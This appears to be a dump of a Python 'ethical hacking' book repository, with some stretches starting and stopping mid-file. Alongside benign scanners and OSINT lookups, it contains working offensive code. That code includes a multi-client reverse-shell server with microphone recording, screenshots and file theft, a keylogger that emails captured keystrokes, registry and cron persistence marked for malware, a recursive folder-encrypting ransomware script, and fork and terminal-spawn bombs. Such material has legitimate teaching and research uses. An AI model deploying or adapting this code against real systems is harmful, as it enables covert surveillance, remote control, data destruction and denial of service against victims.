{tcp_port} Status: {port_state} Reason: {port_up_reason}") 54 | print(f" Service: {port_service_name} Product: 
import socket  # for connecting
from colorama import init, Fore

# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX


def is_port_open(host, port):
    """Return True if `host` accepts a TCP connection on `port`.

    The timeout is applied *before* connect(): in the original code
    settimeout() was called after the connection attempt, where it had
    no effect, so closed/filtered ports could hang for the OS default.
    """
    s = socket.socket()
    # short timeout = faster scan at the cost of some accuracy
    s.settimeout(0.2)
    try:
        s.connect((host, port))
    except OSError:
        # cannot connect: the port is closed or filtered
        return False
    else:
        # the connection was established, port is open!
        return True
    finally:
        # always release the socket (the original leaked one per probe)
        s.close()


if __name__ == "__main__":
    # get the host from the user
    host = input("Enter the host:")
    # iterate over ports, from 1 to 1024 (range upper bound is exclusive)
    for port in range(1, 1025):
        if is_port_open(host, port):
            print(f"{GREEN}[+] {host}:{port} is open {RESET}")
        else:
            print(f"{GRAY}[!] {host}:{port} is closed {RESET}", end="\r")
import socket


def reverse_dns_lookup(ip_address):
    """Return the primary hostname for `ip_address`, or None on failure.

    socket.gethostbyaddr() raises:
      * socket.herror   -- the address has no reverse (PTR) record
      * socket.gaierror -- the argument is not a resolvable address at all
    The original caught only herror, so a malformed IP string crashed the
    caller; both failure modes now map to None.
    """
    try:
        host, _, _ = socket.gethostbyaddr(ip_address)
        return host
    except (socket.herror, socket.gaierror):
        return None


# Example usage
if __name__ == "__main__":
    ip_address = "8.8.8.8"  # Example IP address (Google DNS)
    domain_name = reverse_dns_lookup(ip_address)
    if domain_name:
        print(f"The domain name for IP address {ip_address} is {domain_name}")
    else:
        print(f"No domain name found for IP address {ip_address}")
# Function to check if an IP address (v4 or v6) is syntactically valid.
def is_valid_ip(ip):
    """Return True if `ip` parses as a valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(ip)
        return True
    except ValueError:
        return False


# Get domains on the same IP
def get_domains_on_same_ip(ip):
    """Query the ViewDNS reverse-IP API for other domains hosted on `ip`.

    Returns a list of domain entries, or [] on any API or parsing failure.
    """
    url = f"https://api.viewdns.info/reverseip/?host={ip}&apikey={API_KEY}&output=json"
    # a timeout prevents the request from hanging forever on a dead API
    response = requests.get(url, timeout=30)
    if response.status_code == 200:
        try:
            data = response.json()
        except ValueError:
            # requests raises a ValueError subclass on non-JSON bodies
            print("[-] Error parsing JSON response.")
            print(response.text)
            return []
        # guard the nested lookups: the original read
        # data["response"]["domain_count"] before checking the keys
        # existed, which raised KeyError on API error payloads
        if "response" in data and "domains" in data["response"]:
            domain_count = data["response"].get("domain_count")
            print(f"\n[*] Found {domain_count} domains on {ip}:")
            return data["response"]["domains"]
    return []


# Get user arguments and execute.
def main():
    """Parse the IP list from argv and reverse-look-up each address."""
    parser = argparse.ArgumentParser(description="Perform IP reverse lookup. Requires a ViewDNS API key.")
    parser.add_argument("ips", nargs="+", help="IP address(es) to perform reverse lookup on.")
    args = parser.parse_args()

    for ip in args.ips:
        if not is_valid_ip(ip):
            print(f"[-] Invalid IP address: {ip}")
            continue
        # Get other domains on the same IP
        domains = get_domains_on_same_ip(ip)
        if domains:
            for d in domains:
                print(f"[+] {d}")
        else:
            print("[-] No other domains found on the same IP.")


if __name__ == "__main__":
    main()
import requests

def check_username(username, platform, timeout=10):
    """
    Checks if a username exists on a given platform.

    Args:
        username (str): The username to check.
        platform (str): The URL template for the platform, with '{username}' placeholder.
        timeout (float): Seconds to wait for the HTTP response (default 10).
            The original call had no timeout and could hang indefinitely.

    Returns:
        bool: True if the username exists, False otherwise -- including on
        network errors, which are treated as "not found" instead of
        crashing the whole search.
    """
    url = platform.format(username=username)
    try:
        response = requests.get(url, timeout=timeout)
    except requests.RequestException:
        # connection errors / timeouts: treat as not found
        return False
    return response.status_code == 200
31 | """ 32 | platforms = { 33 | "GitHub": "https://github.com/{username}", 34 | "Twitter": "https://twitter.com/{username}", 35 | "Instagram": "https://www.instagram.com/{username}/", 36 | "Reddit": "https://www.reddit.com/user/{username}", 37 | "Facebook": "https://www.facebook.com/{username}", 38 | "LinkedIn": "https://www.linkedin.com/in/{username}", 39 | } 40 | results = {} 41 | for platform, url in platforms.items(): 42 | if check_username(username, url): 43 | results[platform] = url.format(username=username) 44 | return results 45 | 46 | # Example usage 47 | if __name__ == "__main__": 48 | username = "exampleuser" 49 | results = search_username(username) 50 | if results: 51 | print(f"Found {username} on the following platforms:") 52 | for platform, url in results.items(): 53 | print(f"{platform}: {url}") 54 | else: 55 | print(f"No results found for {username}") 56 | -------------------------------------------------------------------------------- /chapter-2/advanced-reverse-shell/notes.txt: -------------------------------------------------------------------------------- 1 | If you have the following error when importing sounddevice: 2 | 3 | OSError: PortAudio library not found 4 | 5 | Then simply install libportaudio2 on your Linux machine: 6 | 7 | $ apt install libportaudio2 -------------------------------------------------------------------------------- /chapter-2/advanced-reverse-shell/requirements.txt: -------------------------------------------------------------------------------- 1 | pyautogui 2 | sounddevice 3 | scipy 4 | psutil 5 | tabulate 6 | gputil 7 | tqdm -------------------------------------------------------------------------------- /chapter-2/advanced-reverse-shell/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import subprocess 3 | from threading import Thread 4 | import re 5 | import os 6 | 7 | import tabulate 8 | import tqdm 9 | 10 | SERVER_HOST = "0.0.0.0" 11 | SERVER_PORT 
class Server:
    """Multi-client reverse-shell server.

    Accepts client connections on a daemon thread and exposes a small
    interactive interpreter for choosing a client and driving a remote
    shell on it, including screenshot / recordmic / download / upload
    helper commands.
    """

    def __init__(self, host, port):
        self.host = host
        self.port = port
        # the listening socket for incoming reverse-shell clients
        self.server_socket = self.get_server_socket()
        # client address -> connected socket
        self.clients = {}
        # client address -> the client's current working directory
        self.clients_cwd = {}
        # address of the client the server is currently interacting with
        self.current_client = None

    def get_server_socket(self, custom_port=None):
        """Create a bound, listening TCP socket.

        `custom_port` overrides the constructor port; it is used for the
        ad-hoc file-transfer side channels.
        """
        s = socket.socket()
        # if a custom port is set, use it instead
        port = custom_port if custom_port else self.port
        # SO_REUSEADDR must be set *before* bind() to take effect; the
        # original set it afterwards, so "Address already in use" could
        # still occur on quick restarts
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # bind the socket to all IP addresses of this host
        s.bind((self.host, port))
        s.listen(5)
        # report the host actually bound, not the module-level default
        print(f"Listening as {self.host}:{port} ...")
        return s

    def accept_connection(self):
        """Accept clients forever; intended to run on a daemon thread."""
        while True:
            try:
                client_socket, client_address = self.server_socket.accept()
            except OSError:
                # the listening socket was closed by close_connections()
                print("Server socket closed, exiting...")
                break
            print(f"{client_address[0]}:{client_address[1]} Connected!")
            # the client announces its current working directory first
            cwd = client_socket.recv(BUFFER_SIZE).decode()
            print("[+] Current working directory:", cwd)
            # register the client
            self.clients[client_address] = client_socket
            self.clients_cwd[client_address] = cwd

    def accept_connections(self):
        """Start the connection-accepting loop on a daemon thread."""
        self.connection_thread = Thread(target=self.accept_connection)
        # daemon: ends automatically when the main thread ends
        self.connection_thread.daemon = True
        self.connection_thread.start()

    def close_connections(self):
        """Close all the client sockets and server socket.
        Used for closing the program"""
        for _, client_socket in self.clients.items():
            client_socket.close()
        self.server_socket.close()

    def start_interpreter(self):
        """Interactive interpreter: help / list / use / exit commands."""
        while True:
            command = input("interpreter $> ")
            if re.search(r"help\w*", command):
                # "help" is detected, print the help tables
                print("Interpreter usage:")
                print(tabulate.tabulate([["Command", "Usage"], [
                    "help",
                    "Print this help message",
                ], ["list",
                    "List all connected users",
                ], ["use [machine_index]",
                    "Start reverse shell on the specified client, " \
                    "e.g 'use 1' will start the reverse shell on the second connected machine, " \
                    "and 0 for the first one.",
                ]
                ]))
                print("="*30, "Custom commands inside the reverse shell", "="*30)
                print(tabulate.tabulate([["Command", "Usage"], [
                    "abort",
                    "Remove the client from the connected clients",
                ], ["exit|quit",
                    "Get back to interpreter without removing the client",
                ], ["screenshot [path_to_img].png",
                    "Take a screenshot of the main screen and save it as an image file."
                ], ["recordmic [path_to_audio].wav [number_of_seconds]",
                    "Record the default microphone for number of seconds " \
                    "and save it as an audio file in the specified file." \
                    " An example is 'recordmic test.wav 5' will record for 5 " \
                    "seconds and save to test.wav in the current working directory"
                ], ["download [path_to_file]",
                    "Download the specified file from the client"
                ], ["upload [path_to_file]",
                    "Upload the specified file from your local machine to the client"
                ]]))
            elif re.search(r"list\w*", command):
                # list all the connected clients in tabular form
                connected_clients = []
                for index, ((client_host, client_port), cwd) in enumerate(self.clients_cwd.items()):
                    connected_clients.append([index, client_host, client_port, cwd])
                print(tabulate.tabulate(connected_clients, headers=["Index", "Address", "Port", "CWD"]))
            elif (match := re.search(r"use\s*(\w*)", command)):
                try:
                    # the index passed after the "use" command
                    client_index = int(match.group(1))
                except ValueError:
                    # there is no digit after the use command
                    print("Please insert the index of the client, a number.")
                    continue
                else:
                    try:
                        self.current_client = list(self.clients)[client_index]
                    except IndexError:
                        print(f"Please insert a valid index, maximum is {len(self.clients)}.")
                        continue
                    else:
                        # start the reverse shell as self.current_client is set
                        self.start_reverse_shell()
            elif command.lower() in ["exit", "quit"]:
                # leave the interpreter
                break
            elif command == "":
                # do nothing on empty input (i.e a new line)
                pass
            else:
                print("Unavailable command:", command)
        self.close_connections()

    def start(self):
        """Accept client connections and start the main interpreter."""
        self.accept_connections()
        self.start_interpreter()

    def start_reverse_shell(self):
        """Drive a remote shell session with `self.current_client`."""
        # working directory last reported by this client
        cwd = self.clients_cwd[self.current_client]
        client_socket = self.clients[self.current_client]
        while True:
            command = input(f"{cwd} $> ")
            if not command.strip():
                # empty command
                continue
            if (match := re.search(r"local\s*(.*)", command)):
                # "local ..." commands run on this machine, not the client
                local_command = match.group(1)
                if (cd_match := re.search(r"cd\s*(.*)", local_command)):
                    # 'cd' must change this process's directory;
                    # subprocess.getoutput would only affect a child
                    cd_path = cd_match.group(1)
                    if cd_path:
                        os.chdir(cd_path)
                else:
                    local_output = subprocess.getoutput(local_command)
                    print(local_output)
                # local commands are never forwarded to the client
                continue
            # send the command to the client
            client_socket.sendall(command.encode())
            if command.lower() in ["exit", "quit"]:
                # leave this client's shell, keep the client registered
                break
            elif command.lower() == "abort":
                # drop the client entirely and leave the shell
                del self.clients[self.current_client]
                del self.clients_cwd[self.current_client]
                break
            elif (match := re.search(r"download\s*(.*)", command)):
                # receive the file from the client
                self.receive_file()
            elif (match := re.search(r"upload\s*(.*)", command)):
                # send the specified file if it exists
                filename = match.group(1)
                if not os.path.isfile(filename):
                    # restored the filename into the message (the
                    # original format string was broken by extraction)
                    print(f"The file {filename} does not exist in the local machine.")
                else:
                    self.send_file(filename)
            # retrieve command results
            output = self.receive_all_data(client_socket, BUFFER_SIZE).decode()
            # the payload carries command output and the new cwd
            results, cwd = output.split(SEPARATOR)
            # update the cwd
            self.clients_cwd[self.current_client] = cwd
            # print output
            print(results)

        self.current_client = None

    def receive_all_data(self, socket, buffer_size):
        """Call socket.recv() repeatedly until an empty or short read,
        concatenating everything received.

        Note: `socket` here is the parameter (a connected socket object),
        shadowing the module name inside this method only.
        """
        data = b""
        while True:
            output = socket.recv(buffer_size)
            data += output
            if not output or len(output) < buffer_size:
                # a short read is treated as end-of-message
                break
        return data

    def receive_file(self, port=5002):
        """Open a side-channel server socket and receive one file."""
        s = self.get_server_socket(custom_port=port)
        # accept the client's data connection
        client_socket, client_address = s.accept()
        print(f"{client_address} connected.")
        # receive the file
        Server._receive_file(client_socket)

    def send_file(self, filename, port=5002):
        """Open a side-channel server socket and send `filename`."""
        s = self.get_server_socket(custom_port=port)
        # accept the client's data connection
        client_socket, client_address = s.accept()
        print(f"{client_address} connected.")
        # send the file
        Server._send_file(client_socket, filename)

    @classmethod
    def _receive_file(cls, s: socket.socket, buffer_size=4096):
        """Receive "name<SEPARATOR>size" then the raw file bytes on `s`."""
        received = s.recv(buffer_size).decode()
        filename, filesize = received.split(SEPARATOR)
        # remove absolute path if there is one
        filename = os.path.basename(filename)
        # convert to integer
        filesize = int(filesize)
        # progress bar sized by the announced file size (filename restored
        # into the description; the original f-string was broken)
        progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
        with open(filename, "wb") as f:
            while True:
                # read up to buffer_size bytes from the socket
                bytes_read = s.recv(buffer_size)
                if not bytes_read:
                    # nothing received: file transmitting is done
                    break
                f.write(bytes_read)
                # update the progress bar
                progress.update(len(bytes_read))
        # close the socket
        s.close()

    @classmethod
    def _send_file(cls, s: socket.socket, filename, buffer_size=4096):
        """Send "name<SEPARATOR>size" then the file bytes on `s`."""
        # get the file size
        filesize = os.path.getsize(filename)
        # announce name and size (filename restored into the f-string)
        s.send(f"{filename}{SEPARATOR}{filesize}".encode())
        # start sending the file
        progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
        with open(filename, "rb") as f:
            while True:
                # read the bytes from the file
                bytes_read = f.read(buffer_size)
                if not bytes_read:
                    # file transmitting is done
                    break
                # sendall to assure transmission on busy networks
                s.sendall(bytes_read)
                # update the progress bar
                progress.update(len(bytes_read))
        # close the socket
        s.close()


if __name__ == "__main__":
    server = Server(SERVER_HOST, SERVER_PORT)
    server.start()
8 | """ 9 | system = platform.system().lower() 10 | 11 | try: 12 | if system == "windows": 13 | # For Windows 14 | subprocess.run(["taskkill", "/F", "/IM", "python.exe"], check=True) 15 | elif system in ["darwin", "linux"]: 16 | # For macOS and Linux 17 | subprocess.run(["pkill", "-f", "python"], check=True) 18 | else: 19 | print(f"Unsupported operating system: {system}") 20 | return 21 | 22 | print("All Python processes have been terminated successfully.") 23 | except subprocess.CalledProcessError: 24 | print("No Python processes found or unable to terminate processes.") 25 | except Exception as e: 26 | print(f"An error occurred: {str(e)}") 27 | 28 | if __name__ == "__main__": 29 | # Confirm with the user before proceeding 30 | confirmation = input("This will terminate all Python processes. Are you sure? (y/n): ") 31 | 32 | if confirmation.lower() == 'y': 33 | end_python_processes() 34 | else: 35 | print("Operation cancelled.") 36 | -------------------------------------------------------------------------------- /chapter-2/fork-bomb/fork_bomb.py: -------------------------------------------------------------------------------- 1 | # fork_bomb.py 2 | """Using `multiprocessing` module to spawn processes as a cross-platform fork bomb.""" 3 | # Import necessary modules. 4 | from multiprocessing import Process, cpu_count 5 | import time 6 | 7 | # Define a function named counter that takes a number parameter. 8 | def counter(number): 9 | # Run a loop until number reaches 0. 10 | while number > 0: 11 | number -= 1 12 | # Introduce a sleep of 200 ms to intentionally slow down the loop. 13 | time.sleep(0.2) # Adjust sleep time as needed to make it slower. 14 | 15 | 16 | def spawn_processes(num_processes): 17 | # Create a list of Process instances, each targeting the counter function. 18 | processes = [Process(target=counter, args=(1000,)) for _ in range(num_processes)] 19 | # Start each process. 
def spawn_processes(num_processes):
    """Start `num_processes` counter processes, then wait for them all."""
    # one Process per requested worker, all running the same slow counter
    workers = [Process(target=counter, args=(1000,)) for _ in range(num_processes)]
    for worker in workers:
        worker.start()
        print(f"Started process {worker.pid}.")
    # block until every worker has finished before moving on
    for worker in workers:
        worker.join()
        print(f"Process {worker.pid} has finished.")

# Define the main function.
def main():
    """Spawn an intentionally excessive number of processes (fork-bomb demo)."""
    # number of logical processors on the system
    num_processors = cpu_count()
    # a deliberately large process count (num_processors * 200)
    num_processes = num_processors * 200  # Adjust the number of processes to spawn as needed.
    print(f"Number of logical processors: {num_processors}")
    print(f"Creating {num_processes} processes.")
    print("Warning: This will consume a lot of system resources, and potentially freeze your PC, make sure to adjust the number of processes and sleep seconds as needed.")
    # Run an infinite loop if you want.
    # while True:
    #     spawn_processes(num_processes)
    # For demonstration purposes, run the function once and monitor the task manager.
    spawn_processes(num_processes)


# Execute the main function.
if __name__ == "__main__":
    main()
# terminal_spawn_bomb.py -- keeps opening new terminal windows forever.
import os
import subprocess
import time

# Common terminal emulators, tried in order until one is found on PATH.
terminal_emulators = [
    "gnome-terminal",   # GNOME
    "konsole",          # KDE
    "xfce4-terminal",   # XFCE
    "lxterminal",       # LXDE
    "mate-terminal",    # MATE
    "terminator", "xterm", "urxvt"
]

def open_terminal():
    """Launch the first available terminal emulator; True on success."""
    for emulator in terminal_emulators:
        try:
            # `which` exits 0 when the emulator exists on PATH
            if subprocess.call(["which", emulator], stdout=subprocess.DEVNULL) == 0:
                # start it detached in the background
                os.system(f"{emulator} &")
                return True
        except Exception:
            # probing failed for this emulator; try the next one
            continue
    print("No known terminal emulator found!")
    return False

while True:
    if os.name == "nt":
        # Windows: spawn a new cmd window
        os.system("start cmd")
    elif not open_terminal():
        # stop once no terminal emulator can be found at all
        break
    # Sleep 500 ms so the loop stays slow enough to interrupt the script.
    time.sleep(0.5)  # Adjust sleep time as needed to make it slower.
# keylogger.py -- records keystrokes and reports them by email or file.
import smtplib  # for sending email using SMTP protocol
# Timer runs a function after an `interval` amount of time
from threading import Timer
from datetime import datetime
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

SEND_REPORT_EVERY = 60  # in seconds, 60 means 1 minute and so on
EMAIL_ADDRESS = "email@provider.tld"
EMAIL_PASSWORD = "password_here"

class Keylogger:
    """Capture keystrokes globally and report them periodically,
    either by email or by appending to a local log file."""

    def __init__(self, interval, report_method="email"):
        # seconds between two consecutive reports (SEND_REPORT_EVERY)
        self.interval = interval
        # "email" or "file"
        self.report_method = report_method
        # accumulates every keystroke captured within `self.interval`
        self.log = ""
        # start & end datetimes of the current reporting window
        self.start_dt = datetime.now()
        self.end_dt = datetime.now()

    def callback(self, event):
        """
        Invoked on every keyboard event (key release in this setup);
        translates the key name and appends it to `self.log`.
        """
        name = event.name
        if len(name) > 1:
            # not a character, special key (e.g ctrl, alt, etc.)
            if name == "space":
                # " " instead of "space"
                name = " "
            elif name == "enter":
                # add a new line whenever an ENTER is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                # replace spaces with underscores, uppercase with []
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        # finally, add the key name to the log
        self.log += name

    def update_filename(self):
        """Build `self.filename` from the window's start & end datetimes."""
        # "YYYY-MM-DD hh:mm:ss.ffffff" -> "YYYY-MM-DD-hhmmss"
        # NOTE: [:-7] assumes a microseconds component; datetime.now()
        # virtually always produces one
        start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
        end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
        self.filename = f"keylog-{start_dt_str}_{end_dt_str}"

    def report_to_file(self):
        """Write the current keylogs in `self.log` to `self.filename`.txt
        in the current directory."""
        with open(f"{self.filename}.txt", "w") as f:
            # write the keylogs to the file
            print(self.log, file=f)
        print(f"[+] Saved {self.filename}.txt")

    def prepare_mail(self, message):
        """Build a MIME message with plain-text and HTML alternatives and
        return it serialized as a string."""
        msg = MIMEMultipart("alternative")
        msg["From"] = EMAIL_ADDRESS
        msg["To"] = EMAIL_ADDRESS
        msg["Subject"] = "Keylogger logs"
        # simple paragraph, feel free to edit (the markup was destroyed
        # by text extraction; restored to a plain paragraph)
        html = f"<p>{message}</p>"
        text_part = MIMEText(message, "plain")
        html_part = MIMEText(html, "html")
        msg.attach(text_part)
        msg.attach(html_part)
        # after making the mail, convert back to a string message
        return msg.as_string()

    def sendmail(self, email, password, message, verbose=1):
        """Send `message` to/from `email` via the Office365 SMTP server."""
        # manages a connection to an SMTP server
        # (Microsoft365, Outlook, Hotmail, and live.com)
        server = smtplib.SMTP(host="smtp.office365.com", port=587)
        # upgrade the connection to TLS before authenticating
        server.starttls()
        # login to the email account
        server.login(email, password)
        # send the actual message after preparation
        server.sendmail(email, email, self.prepare_mail(message))
        # terminates the session
        server.quit()
        if verbose:
            print(f"{datetime.now()} - Sent an email to {email} containing: {message}")

    def report(self):
        """
        Called every `self.interval` seconds: sends/saves the collected
        keylogs, resets `self.log`, and re-arms the timer.
        """
        if self.log:
            # if there is something in the log, report it
            self.end_dt = datetime.now()
            # update `self.filename`
            self.update_filename()
            if self.report_method == "email":
                self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
            elif self.report_method == "file":
                self.report_to_file()
            # if you don't want to print in the console, comment below line
            print(f"[{self.filename}] - {self.log}")
            self.start_dt = datetime.now()
        self.log = ""
        timer = Timer(interval=self.interval, function=self.report)
        # set the thread as daemon (dies when main thread dies)
        timer.daemon = True
        # start the timer
        timer.start()

    def start(self):
        """Hook the keyboard and begin the periodic reporting loop.
        Blocks until interrupted (CTRL+C)."""
        # record the start datetime
        self.start_dt = datetime.now()
        # `keyboard` is imported lazily: it is third-party and may need
        # root privileges, so merely importing this module (e.g. for
        # tests) must not require it
        import keyboard
        # fire self.callback on every key release
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        print(f"{datetime.now()} - Started keylogger")
        # block the current thread, wait until CTRL+C is pressed
        keyboard.wait()


if __name__ == "__main__":
    # if you want a keylogger to send to your email
    # keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email")
    # if you want a keylogger to record keylogs to a local file
    # (and then send it using your favorite method)
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
    keylogger.start()
18 | """ 19 | # Path of the executable to run; e.g., python.exe 20 | exe = sys.executable 21 | # Path to the script to run at startup 22 | script_path = os.path.realpath(__file__) 23 | # Key to modify 24 | key_path = r"Software\Microsoft\Windows\CurrentVersion\Run" 25 | # Specify the command 26 | if exe.endswith("python.exe"): 27 | command = f"{exe} {script_path}" 28 | else: 29 | # If the executable is not python, we need to specify the executable only 30 | command = exe 31 | key = reg.OpenKey(reg.HKEY_CURRENT_USER, key_path, 0, reg.KEY_ALL_ACCESS) 32 | reg.SetValueEx(key, "MyScript", 0, reg.REG_SZ, command) # Add the key to the registry 33 | reg.CloseKey(key) 34 | 35 | 36 | def add_to_cron(): 37 | """ 38 | Add the script to the crontab to run at startup on Linux or macOS. 39 | 40 | This function adds the path to the current script to the user's crontab, 41 | with the "@reboot" directive, so that the script will be executed every 42 | time the system starts up. 43 | """ 44 | # Append new cron job 45 | if sys.executable.endswith("python") or sys.executable.endswith("python3"): 46 | # Path to the script to run at startup 47 | script_path = os.path.realpath(__file__) 48 | command = f'(crontab -l 2>/dev/null; echo "@reboot {sys.executable} {script_path}") | crontab -' 49 | else: 50 | # If the executable is not python, we need to specify the executable only 51 | command = f'(crontab -l 2>/dev/null; echo "@reboot {sys.executable}") | crontab -' 52 | # Execute the command 53 | os.system(command) 54 | 55 | 56 | def make_persistent(): 57 | """ 58 | Make the script persistent across system reboots. 59 | 60 | This function checks the operating system and calls the appropriate 61 | function (add_to_registry or add_to_cron) to make the script run 62 | automatically at system startup. 
63 | """ 64 | os_type = platform.system() 65 | if os_type == "Windows": 66 | add_to_registry() 67 | elif os_type in ["Linux", "Darwin"]: # Darwin is macOS 68 | add_to_cron() 69 | 70 | 71 | # Example usage 72 | make_persistent() 73 | 74 | 75 | # enter your malware code here 76 | import time 77 | 78 | while True: 79 | # Do something here 80 | time.sleep(1) 81 | print("Malware running...") 82 | -------------------------------------------------------------------------------- /chapter-2/ransomware/ransomware.py: -------------------------------------------------------------------------------- 1 | import pathlib 2 | import secrets 3 | import os 4 | import base64 5 | import getpass 6 | 7 | import cryptography 8 | from cryptography.fernet import Fernet 9 | from cryptography.hazmat.primitives.kdf.scrypt import Scrypt 10 | 11 | 12 | def generate_salt(size=16): 13 | """Generate the salt used for key derivation, 14 | `size` is the length of the salt to generate""" 15 | return secrets.token_bytes(size) 16 | 17 | 18 | def derive_key(salt, password): 19 | """Derive the key from the `password` using the passed `salt`""" 20 | kdf = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1) 21 | return kdf.derive(password.encode()) 22 | 23 | 24 | def load_salt(): 25 | # load salt from salt.salt file 26 | return open("salt.salt", "rb").read() 27 | 28 | 29 | def generate_key(password, salt_size=16, load_existing_salt=False, save_salt=True): 30 | """ 31 | Generates a key from a `password` and the salt. 32 | If `load_existing_salt` is True, it'll load the salt from a file 33 | in the current directory called "salt.salt". 
34 | If `save_salt` is True, then it will generate a new salt 35 | and save it to "salt.salt" 36 | """ 37 | if load_existing_salt: 38 | # load existing salt 39 | salt = load_salt() 40 | elif save_salt: 41 | # generate new salt and save it 42 | salt = generate_salt(salt_size) 43 | with open("salt.salt", "wb") as salt_file: 44 | salt_file.write(salt) 45 | # generate the key from the salt and the password 46 | derived_key = derive_key(salt, password) 47 | # encode it using Base 64 and return it 48 | return base64.urlsafe_b64encode(derived_key) 49 | 50 | 51 | def encrypt(filename, key): 52 | """ 53 | Given a filename (str) and key (bytes), it encrypts the file and write it 54 | """ 55 | f = Fernet(key) 56 | with open(filename, "rb") as file: 57 | # read all file data 58 | file_data = file.read() 59 | # encrypt data 60 | encrypted_data = f.encrypt(file_data) 61 | # write the encrypted file 62 | with open(filename, "wb") as file: 63 | file.write(encrypted_data) 64 | 65 | 66 | def encrypt_folder(foldername, key): 67 | # if it's a folder, encrypt the entire folder (i.e all the containing files) 68 | for child in pathlib.Path(foldername).glob("*"): 69 | if child.is_file(): 70 | print(f"[*] Encrypting {child}") 71 | encrypt(child, key) 72 | elif child.is_dir(): 73 | encrypt_folder(child, key) 74 | 75 | 76 | 77 | def decrypt(filename, key): 78 | """ 79 | Given a filename (str) and key (bytes), it decrypts the file and write it 80 | """ 81 | f = Fernet(key) 82 | with open(filename, "rb") as file: 83 | # read the encrypted data 84 | encrypted_data = file.read() 85 | # decrypt data 86 | try: 87 | decrypted_data = f.decrypt(encrypted_data) 88 | except cryptography.fernet.InvalidToken: 89 | print("[!] 
Invalid token, most likely the password is incorrect") 90 | return 91 | # write the original file 92 | with open(filename, "wb") as file: 93 | file.write(decrypted_data) 94 | 95 | 96 | def decrypt_folder(foldername, key): 97 | # if it's a folder, decrypt the entire folder 98 | for child in pathlib.Path(foldername).glob("*"): 99 | if child.is_file(): 100 | print(f"[*] Decrypting {child}") 101 | decrypt(child, key) 102 | elif child.is_dir(): 103 | decrypt_folder(child, key) 104 | 105 | 106 | if __name__ == "__main__": 107 | import argparse 108 | parser = argparse.ArgumentParser(description="File Encryptor Script with a Password") 109 | parser.add_argument("path", help="Path to encrypt/decrypt, can be a file or an entire folder") 110 | parser.add_argument("-s", "--salt-size", help="If this is set, a new salt with the passed size is generated", 111 | type=int) 112 | parser.add_argument("-e", "--encrypt", action="store_true", 113 | help="Whether to encrypt the file/folder, only -e or -d can be specified.") 114 | parser.add_argument("-d", "--decrypt", action="store_true", 115 | help="Whether to decrypt the file/folder, only -e or -d can be specified.") 116 | 117 | args = parser.parse_args() 118 | 119 | if args.encrypt: 120 | password = getpass.getpass("Enter the password for encryption: ") 121 | elif args.decrypt: 122 | password = getpass.getpass("Enter the password you used for encryption: ") 123 | 124 | if args.salt_size: 125 | key = generate_key(password, salt_size=args.salt_size, save_salt=True) 126 | else: 127 | key = generate_key(password, load_existing_salt=True) 128 | 129 | encrypt_ = args.encrypt 130 | decrypt_ = args.decrypt 131 | 132 | if encrypt_ and decrypt_: 133 | raise TypeError("Please specify whether you want to encrypt the file or decrypt it.") 134 | elif encrypt_: 135 | if os.path.isfile(args.path): 136 | # if it is a file, encrypt it 137 | encrypt(args.path, key) 138 | elif os.path.isdir(args.path): 139 | encrypt_folder(args.path, key) 140 | elif 
    elif decrypt_:
        # decrypt a single file, or recursively decrypt a whole folder
        if os.path.isfile(args.path):
            decrypt(args.path, key)
        elif os.path.isdir(args.path):
            decrypt_folder(args.path, key)
    else:
        # neither -e nor -d was given
        raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
--------------------------------------------------------------------------------
/chapter-2/ransomware/requirements.txt:
--------------------------------------------------------------------------------
cryptography
--------------------------------------------------------------------------------
/chapter-2/ransomware/test-folder/Documents/free-Chapter 1_ Introduction-to-PDF-Processing-in-Python.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Documents/free-Chapter 1_ Introduction-to-PDF-Processing-in-Python.pdf
--------------------------------------------------------------------------------
/chapter-2/ransomware/test-folder/Documents/free-Chapter_2_Building_Malware.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Documents/free-Chapter_2_Building_Malware.pdf
--------------------------------------------------------------------------------
/chapter-2/ransomware/test-folder/Files/Archive/my-archive.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Files/Archive/my-archive.zip
--------------------------------------------------------------------------------
/chapter-2/ransomware/test-folder/Files/Programs/7z2107-x64.exe:
